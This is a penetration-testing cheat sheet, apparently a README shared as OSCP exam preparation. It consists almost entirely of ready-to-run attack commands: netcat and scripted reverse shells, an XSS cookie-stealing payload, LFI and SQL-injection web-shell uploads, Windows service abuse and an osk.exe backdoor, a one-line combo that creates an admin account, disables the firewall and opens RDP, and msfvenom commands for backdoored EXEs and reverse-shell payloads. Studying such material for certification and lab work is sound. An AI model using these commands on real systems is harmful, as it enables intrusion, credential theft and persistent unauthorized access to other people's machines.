Go-For-OSCP
I want to share a couple of things that I think helped me preparing the Offensive Security Certified Professional - OSCP certification and what I found useful during the labs and exam. If you have any questions, feel free to contact me.
Don't forget to:
- Follow the courseware first and then start practicing in the labs.
- Use additional sources to learn more.
- Join the offensive security PWK forums and social media and talk to other people.
Tips
Enable service on every reboot:
update-rc.d <[SERVICE]> enable
Extract link from html page:
cat index.html | grep "href=" | cut -d "/" -f3| grep "<[DOMAIN]>" | cut -d '"' -f1 | sort -u
Netcat
Interact with application:
nc -nv <[IP]> <[PORT]>
Listener:
nc -nlvp <[PORT]>
File transfer (client):
nc -nlvp <[PORT]> > <[FILE]>
File transfer (server):
nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]>
Bind vs Reverse Shell
Bind Shell:
Bob needs Alice's help. Bob set up a listener on port 4444 with -e parameter:
(BOB): nc -nlvp <[PORT]> -e cmd.exe
(ALICE): nc -nv <[BOB_IP]> <[PORT]>
Reverse Shell:
Alice needs Bob's help. Since Alice is beyond firewall it is impossible to BOB to reach Alice. So Alice create a reverse shell:
(ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash
(BOB): nc -nlvp <[PORT]>
Zone Transfer
dnsrecon -t axfr -d <[DOMAIN]>
Nmap
nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]>
SMB
nbtscan <[SUBNET]>
nmap -p139,445 --script smb-enum-users <[SUBNET]>
nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]>
enum4linux
smbclient -L <[IP]> -N
smbclient \\<[IP]>\share -N
SMTP
nmap -p25 <[SUBNET]> --open
nc -nv IP 25
VRFY <[USERNAME]>
SNMP
Steps: nmap scan udp 161, create target IP list, create community list file, use onesixtyone + snmpwalk
nmap -sU --open -p161 <[SUBNET]> --open
onesixtyone -c community -i <[SMNP_IP_LIST]>
snmpwalk -c public -v1 <[IP]> <mib-values>
Mib-values (for snmpwalk):
1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User
1.3.6.1.2.1.6.13.1.3 TCP Local Ports
File Transfer Linux
Netcat:
On Victim machine (client):
nc -nlvp 4444 > <[FILE]>
On Attacker machine (server):
nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]>
Curl:
curl -O http://<[IP]>/<[FILE]>
Wget:
wget http://<[IP]>/<[FILE]>
Recursive wget ftp download:
wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]>
File Transfer Windows
TFTP (Installed by default up to Windows XP and 2003, In Windows 7, 2008 and above needs to be explicitly added. For this reason tftp not ideal file transfer protocol in most situations.)
On attacker machine:
mkdir tftp
atftpd --deamon --port 69 tftp
cp <[FILE]> tftp
On victim machine shell:
tftp -i <[IP]> GET <[FILE]>
FTP (Windows operating systems contain a default FTP client that can also be used for file transfer)
On attacker machine:
(UNA TANTUM) Install a ftp server. apt-get install pure-ftpd
(UNA TANTUM) Create new user for PureFTPD (see script setup-ftp.sh) (USER demo, PASS demo1234)
groupadd ftgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd demo -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome
/etc/init.d/pure-ftpd restart
(UNA TANTUM) chmod 755 setup-ftp.sh
On victim machine shell:
echo open <[IP]> 21 > ftp.txt
echo USER demo >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
VBScript (in Windows XP, 2003)
On victim machine shell:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs &
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs &
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs &
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs &
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs &
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs &
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs &
echo Err.Clear >> wget.vbs &
echo Set http = Nothing >> wget.vbs &
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs &
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs &
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs &
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs &
echo http.Open "GET", strURL, False >> wget.vbs &
echo http.Send >> wget.vbs &
echo varByteArray = http.ResponseBody >> wget.vbs &
echo Set http = Nothing >> wget.vbs &
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs &
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs &
echo strData = "" >> wget.vbs &
echo strBuffer = "" >> wget.vbs &
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs &
echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs &
echo Next >> wget.vbs &
echo ts.Close >> wget.vbs
cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]>
Powershell (In Windows 7, 2008 and above)
On victim machine shell:
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1
echo $file = "evil.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Debug.exe utility (In Windows 32bit OS - Works only for file < 64Kb)
On attacker machine:
cp <[FILE]> .
upx -9 <[FILE]> (for compression)
cp /usr/share/windows-binaries/exe2bat.exe .
wine exe2bat <[FILE]> <[FILE.txt]>
On victim machine:
Paste the content of <[FILE.txt]>
XSS
Stole cookie from xss:
On attacker machine set listener (nc -nlvp <[PORT]>)
On victim website <script>new Image().src="http://<[IP]>:<[PORT]>/test.php?output="+document.cookie;</script>
LFI/RFI
Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send <?php echo shell_exec($_GET['cmd']);?>, after that try to include log file for code execution.
&cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00
SQL Injection
Bse:
any' or 1=1 limit 1;--
Number of columns:
order by 1, order by 2, ...
Expose data from database:
UNION select 1,2,3,4,5,6
Enum tables:
UNION select 1,2,3,4,table_name,6 FROM information_schema.tables
Shell upload:
<[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 union select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php'
Buffer Overflow
/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]>
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -<[ADDRESS]>
Privilege Escalation
Vulnerable Services
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
sc qc <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= ""
sc config <[VULNERABLE_SERVICE]> start= "auto"
sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrator hacker /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
Win10:
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
Then ctrl+alt+canc and start virtual keyboard
Pass the hash
Export SMBHASH=<[HASH]>
pth-winexe -U administrator% //<[IP]> cmd
Cracking
Medusa
medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)
ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
Firewall
Enable Remote Desktop:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service remotedesktop enable
Enable Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Disable firewall:
netsh firewall set opmode disable
One shot ninja combo (New Admin User, Firewall Off + RDP):
set CMD "net user hacker Hacker123 /add & net localgroup administrators hacker /add & net localgroup \"Remote Desktop Users\" hacker /add & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable"
Backdooring EXE Files
msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o <[FILE_NAME]>
Binaries payloads
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]>
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]>
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]>
Web payloads
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]>
cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]>
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]>
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]>
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f war > <[FILE_NAME.war]>
Scripting Payloads
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]>
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]>
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]>
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Windows Based Shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Mac Based Shellcode:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Staged vs Non-Staged Payloads
Staged payload: (useful for bof) (need multi_handler metasploit in order to works)
Windows/shell/reverse_tcp
msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]>
Non-staged: (ok with netcat listener)
Windows/shell_reverse_tcp
msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <[PAYLOAD_NAME]>
set LHOST <[IP]>
set LPORT <[PORT]>
set ExitOnSession false
exploit -j -z
Shell Spawning
Python:
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bash:
echo os.system('/bin/bash')
/bin/sh -i
exec 5<>/dev/tcp/<[IP]>/<[PORT]> cat <&5 | while read line; do $line 2>&5 >&5; done
Perl:
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby:
ruby: exec "/bin/sh"
Lua:
lua: os.execute('/bin/sh')
From within IRB:
exec "/bin/sh"
From within vi:
:!bash
From within vi:
:set shell=/bin/bash:shell
From within nmap:
!sh